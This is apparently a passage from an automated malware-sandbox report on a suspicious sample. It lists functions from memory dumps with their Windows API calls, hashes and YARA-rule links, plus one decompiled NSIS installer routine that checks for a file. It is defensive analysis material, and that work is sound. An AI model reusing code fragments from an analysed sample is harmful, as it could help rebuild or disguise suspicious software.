                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aef66abb6a950f0a94202b2d29fc5ceacd09d0a63952dd80ea3fefb4c63c374c
                                                                                                                                                    • Instruction ID: 8b071e321a6d818b32b9a19c10d5c06c8764c11ea41f8ed3453617d5f2038c49
                                                                                                                                                    • Opcode Fuzzy Hash: aef66abb6a950f0a94202b2d29fc5ceacd09d0a63952dd80ea3fefb4c63c374c
                                                                                                                                                    • Instruction Fuzzy Hash: D8D1D475E00A16ABEF74CED9C860BCFB7BAAF85710F24451BE854A7240E77489098F58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65C6E4, Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6E65C742
                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6E65C757
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$SizeTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3321136615-0
                                                                                                                                                    • Opcode ID: 33fb653d30f0575485ade310170565187c76d024c94d8785e7129e02b9ec5e35
                                                                                                                                                    • Instruction ID: efca1380d7177893bf495a62bc4db51203fcf8fde5853c38f30ab658ebdcdb66
                                                                                                                                                    • Opcode Fuzzy Hash: 33fb653d30f0575485ade310170565187c76d024c94d8785e7129e02b9ec5e35
                                                                                                                                                    • Instruction Fuzzy Hash: 9F516B71B106049FCB14DFA9C894C9ABBF9BF55720B004A2EE057DB790EB30E904CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E677F18, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 6E677F8B
                                                                                                                                                    • _free.LIBCMT ref: 6E677FE1
                                                                                                                                                      • Part of subcall function 6E677DBD: _free.LIBCMT ref: 6E677E15
                                                                                                                                                      • Part of subcall function 6E677DBD: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,6E68BAA0), ref: 6E677E27
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$InformationTimeZone
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 597776487-0
                                                                                                                                                    • Opcode ID: 47b53555c6173a74a8ca46b18e8387609f504092159ccdf501705395fcd90c9c
                                                                                                                                                    • Instruction ID: 4079f78c22f682f1e836d2549254acb262717bed066c2c03078d3aa2b0cb27bb
                                                                                                                                                    • Opcode Fuzzy Hash: 47b53555c6173a74a8ca46b18e8387609f504092159ccdf501705395fcd90c9c
                                                                                                                                                    • Instruction Fuzzy Hash: 56212B7284421AA7DF308AB68D44EDA777CDF83725F100A95D494B72D0EB74BD80CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64FDE0, Relevance: 4.6, APIs: 3, Instructions: 69memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64FE19
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64FE7C
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E64FE95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1698587239-0
                                                                                                                                                    • Opcode ID: 3c5a3e25ead1c6f37ae89b1abfc7afa72ee286aec28f4e77bd62035e061638c8
                                                                                                                                                    • Instruction ID: 59f446c3c84cb78a1c1a2e9c76bc25d29f91397b18866787a1bda7ca4f45205a
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5a3e25ead1c6f37ae89b1abfc7afa72ee286aec28f4e77bd62035e061638c8
                                                                                                                                                    • Instruction Fuzzy Hash: E521627190410DEFC714DFE5C900BEEB7BDEB4A724F205629E425AB3D0DB7419019B6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65B131, Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000000,?,6E65B257,?,?), ref: 6E65B13D
                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,6E65077D,?,00000000,6E6915CC,00000000), ref: 6E65B17C
                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,6E65077D,?,00000000,6E6915CC,00000000), ref: 6E65B188
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$FileFindNamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3295048339-0
                                                                                                                                                    • Opcode ID: aa7098067931221a0e6e8b08641032247a56ca42a9f289b2cb89f2be7947a1f3
                                                                                                                                                    • Instruction ID: 002a5ca26a3672dad2b6b73093cb0ef93c297d9c223412bdd672feafa11d934c
                                                                                                                                                    • Opcode Fuzzy Hash: aa7098067931221a0e6e8b08641032247a56ca42a9f289b2cb89f2be7947a1f3
                                                                                                                                                    • Instruction Fuzzy Hash: A811A370610308AFDB50AFE1D80CB8E3B9CAF02318F108819F52987355DB71C461CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F7F0, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000488,?,?,6E64F7BE,00000000), ref: 6E64F7FA
                                                                                                                                                    • CoUninitialize.OLE32(?,?,6E64F7BE,00000000), ref: 6E64F852
                                                                                                                                                      • Part of subcall function 6E636550: DestroyWindow.USER32 ref: 6E63656E
                                                                                                                                                      • Part of subcall function 6E636550: DestroyWindow.USER32(?), ref: 6E63658D
                                                                                                                                                      • Part of subcall function 6E636550: DestroyWindow.USER32(?), ref: 6E6365AD
                                                                                                                                                      • Part of subcall function 6E636550: DestroyWindow.USER32(?), ref: 6E6365CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow$CloseHandleUninitialize
                                                                                                                                                    • String ID: hAn
                                                                                                                                                    • API String ID: 4084040042-4209865105
                                                                                                                                                    • Opcode ID: 4af622f0d0864294159a425aa6e38373bd8bfcee933c24c9294806a25ca8713f
                                                                                                                                                    • Instruction ID: 38f7e8487eb02832fce61b58b2b28ac5794a04a11b9c2280e1f91e17ba9d6d06
                                                                                                                                                    • Opcode Fuzzy Hash: 4af622f0d0864294159a425aa6e38373bd8bfcee933c24c9294806a25ca8713f
                                                                                                                                                    • Instruction Fuzzy Hash: FE01A2706A0606DFDB84EFE2CA18B7933B9BB47325F31462AF4014B380CB795880CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E651A19, Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000040,00000000,00000002,?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A38
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A46
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A53
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                    • Opcode ID: 998fc7aa472edcbb59d089b34a08e879a65c242a9942e5cac8da07e4233a09cb
                                                                                                                                                    • Instruction ID: 29970ba3978f858c4874dfa5a34b0c91db31a493226f5fb29c91222a9b7fd8e7
                                                                                                                                                    • Opcode Fuzzy Hash: 998fc7aa472edcbb59d089b34a08e879a65c242a9942e5cac8da07e4233a09cb
                                                                                                                                                    • Instruction Fuzzy Hash: 2AF01775A00609FFCF14DFA5DC4889EBBB8EB4A320B108659F816A6350D7709A109A60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65AA2A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6E65AA31
                                                                                                                                                      • Part of subcall function 6E65A4DE: TlsAlloc.KERNEL32(?,6E65AA5D,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65A4FD
                                                                                                                                                      • Part of subcall function 6E65A4DE: InitializeCriticalSection.KERNEL32(6E69E860,?,6E65AA5D,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65A50E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocCriticalH_prolog3InitializeSection
                                                                                                                                                    • String ID: Din
                                                                                                                                                    • API String ID: 2369468792-422385385
                                                                                                                                                    • Opcode ID: c66d4a1aa04ef13285bef70b454200ca86931a5e40296669e56f7bd985ca179a
                                                                                                                                                    • Instruction ID: 2c5073f9f3b0b9a5f3922bbb86bedb8a3d1311cf6fc073142d7f6d6f6c85f67e
                                                                                                                                                    • Opcode Fuzzy Hash: c66d4a1aa04ef13285bef70b454200ca86931a5e40296669e56f7bd985ca179a
                                                                                                                                                    • Instruction Fuzzy Hash: C2012130B506179BEB45AFF5C95459D37EABF41368B104525D411CB390EB34CD61C764
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E651523, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6E65152A
                                                                                                                                                      • Part of subcall function 6E6511D2: __EH_prolog3.LIBCMT ref: 6E6511D9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                    • String ID: $mhn
                                                                                                                                                    • API String ID: 431132790-1228215030
                                                                                                                                                    • Opcode ID: 2f7bb13f461edbe2d8f0797587fd6b10194024ea77da94bc6991ba1dbb3155d0
                                                                                                                                                    • Instruction ID: ae86605eaaa5925ac917d4a3746d2ec6aa0243aa42724e1333c2b9364cfbaf2f
                                                                                                                                                    • Opcode Fuzzy Hash: 2f7bb13f461edbe2d8f0797587fd6b10194024ea77da94bc6991ba1dbb3155d0
                                                                                                                                                    • Instruction Fuzzy Hash: 53010070A1052AEFCF04DFE4C8559EEBB79FF08354B104A19E425673D0DB709964CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E642860, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: allocator
                                                                                                                                                    • String ID: H'inH'in%
                                                                                                                                                    • API String ID: 3447690668-4265238316
                                                                                                                                                    • Opcode ID: 87a2e5ccfaefb10d569a5b13e4bb871ff6688d3f27826434600c13f3c45a4035
                                                                                                                                                    • Instruction ID: 5d60b14c0cf8d035dd88c20fd52f660093b0b724ddb78598d5bc05b6b2938724
                                                                                                                                                    • Opcode Fuzzy Hash: 87a2e5ccfaefb10d569a5b13e4bb871ff6688d3f27826434600c13f3c45a4035
                                                                                                                                                    • Instruction Fuzzy Hash: F0C080B511010CABC748DFD8EC40D9A339D5B48618B00C414B50DC7301DB31F900C7A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62D050, Relevance: 3.1, APIs: 2, Instructions: 115memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62D139
                                                                                                                                                      • Part of subcall function 6E652D44: __EH_prolog3.LIBCMT ref: 6E652D4B
                                                                                                                                                      • Part of subcall function 6E652D44: __EH_prolog3_catch.LIBCMT ref: 6E652D8D
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62D1FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$H_prolog3H_prolog3_catch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1036897443-0
                                                                                                                                                    • Opcode ID: ad83c0ae01a08709622baeaae193a6abc333c763a0cdbe6ee897c37ff5cae3a4
                                                                                                                                                    • Instruction ID: b4e8950350843559c751b020e7b2a37a7dc64dda91dcfcc10a9facdb475b3ba7
                                                                                                                                                    • Opcode Fuzzy Hash: ad83c0ae01a08709622baeaae193a6abc333c763a0cdbe6ee897c37ff5cae3a4
                                                                                                                                                    • Instruction Fuzzy Hash: E151077190012C9FCB69CBA4CD91BDEB7B8AF09314F1086E9D55A67290DB302F85CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62C3C0, Relevance: 3.1, APIs: 2, Instructions: 92sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,3920FDCC), ref: 6E62C409
                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 6E62C411
                                                                                                                                                      • Part of subcall function 6E651A19: SetFilePointer.KERNELBASE(?,00000040,00000000,00000002,?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A38
                                                                                                                                                      • Part of subcall function 6E651A19: GetLastError.KERNEL32(?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A46
                                                                                                                                                      • Part of subcall function 6E651A19: GetLastError.KERNEL32(?,?,?,?,?,6E62C457,00000008,?,00000002,?,00000040,00000000), ref: 6E651A53
                                                                                                                                                      • Part of subcall function 6E65205A: __EH_prolog3.LIBCMT ref: 6E652061
                                                                                                                                                      • Part of subcall function 6E6514E1: FindCloseChangeNotification.KERNELBASE(?,?,?,6E62C37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E6514F0
                                                                                                                                                      • Part of subcall function 6E6514E1: GetLastError.KERNEL32(?,?,?,6E62C37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E651514
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$File$ChangeCloseFindH_prolog3ModuleNameNotificationPointerSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1839785596-0
                                                                                                                                                    • Opcode ID: 5c07859c6978e996de4bc1974d0dc054716f40fd12568a3dffa7570cf7f10fb5
                                                                                                                                                    • Instruction ID: fb0a1013d928f1ce0cd6df5a297e2260448969d4f2e9beddff7f1671d3d06b5e
                                                                                                                                                    • Opcode Fuzzy Hash: 5c07859c6978e996de4bc1974d0dc054716f40fd12568a3dffa7570cf7f10fb5
                                                                                                                                                    • Instruction Fuzzy Hash: 34413970A4111CAEDB24DF94DC99BEDB7B8EB44704F2045D9A10AA7280DB742F98CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004067AA, Relevance: 3.1, APIs: 2, Instructions: 53stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004067AA(void* __eflags, intOrPtr _a4) {
				signed char* _t12;
				signed int _t14;
				long _t16;
				signed int _t17;
				signed short* _t24;
				signed int _t26;

				E00406035(0x461e18, _a4);
				_t24 = E00405D85(0x461e18);
				if(_t24 != 0) {
					E00406064(_t24);
					if(( *0x47eb08 & 0x00000080) == 0) {
						L5:
						_t26 = _t24 - 0x461e18 >> 1;
						while(lstrlenW(0x461e18) > _t26) {
							_t12 = E00406301(0x461e18);
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040677D(0x461e18);
								continue;
							} else {
								_t14 = 0;
								L11:
								return _t14;
							}
						}
						E0040674E(0x461e18);
						_t16 = GetFileAttributesW(0x461e18); // executed
						_t14 = 0 | _t16 != 0xffffffff;
						goto L11;
					}
					_t17 =  *_t24 & 0x0000ffff;
					if(_t17 == 0 || _t17 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                                                    0x004067b6
                                                                                                                                                    0x004067c1
                                                                                                                                                    0x004067c5
                                                                                                                                                    0x004067cc
                                                                                                                                                    0x004067d8
                                                                                                                                                    0x004067e7
                                                                                                                                                    0x004067f0
                                                                                                                                                    0x00406809
                                                                                                                                                    0x004067f5
                                                                                                                                                    0x004067fc
                                                                                                                                                    0x00406804
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040682d
                                                                                                                                                    0x0040682d
                                                                                                                                                    0x00406827
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406827
                                                                                                                                                    0x004067fc
                                                                                                                                                    0x00406811
                                                                                                                                                    0x00406817
                                                                                                                                                    0x00406825
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406825
                                                                                                                                                    0x004067da
                                                                                                                                                    0x004067e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004067e0
                                                                                                                                                    0x004067c7
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                      • Part of subcall function 00405D85: CharNextW.USER32(-00000002,?,00461E18,004E30C8,004067C1,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 00405D93
                                                                                                                                                      • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405D98
                                                                                                                                                      • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405DB0
                                                                                                                                                    • lstrlenW.KERNEL32(00461E18,004E30C8,00000000,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 0040680A
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00461E18,00461E18), ref: 00406817
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3248276644-0
                                                                                                                                                    • Opcode ID: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                                                    • Instruction ID: c271629f7750957e5fd102afcb20a97c51063d27386b99ed5bca430d7485d950
                                                                                                                                                    • Opcode Fuzzy Hash: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                                                    • Instruction Fuzzy Hash: 9201F72210592215D61277360C49D6F19848E46778317453FF813B32D2DF3CC972D0BE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65C36B, Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,00001000,00000000,?,?,?,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E65C386
                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,00001000,?,?,?,?,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E65C39A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$System$FileLocalSpecific
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1707611234-0
                                                                                                                                                    • Opcode ID: 4bf8361ba1f2b8a589bfc1e6be5a204070aa36ed726e19a05c97f80d9f3f764e
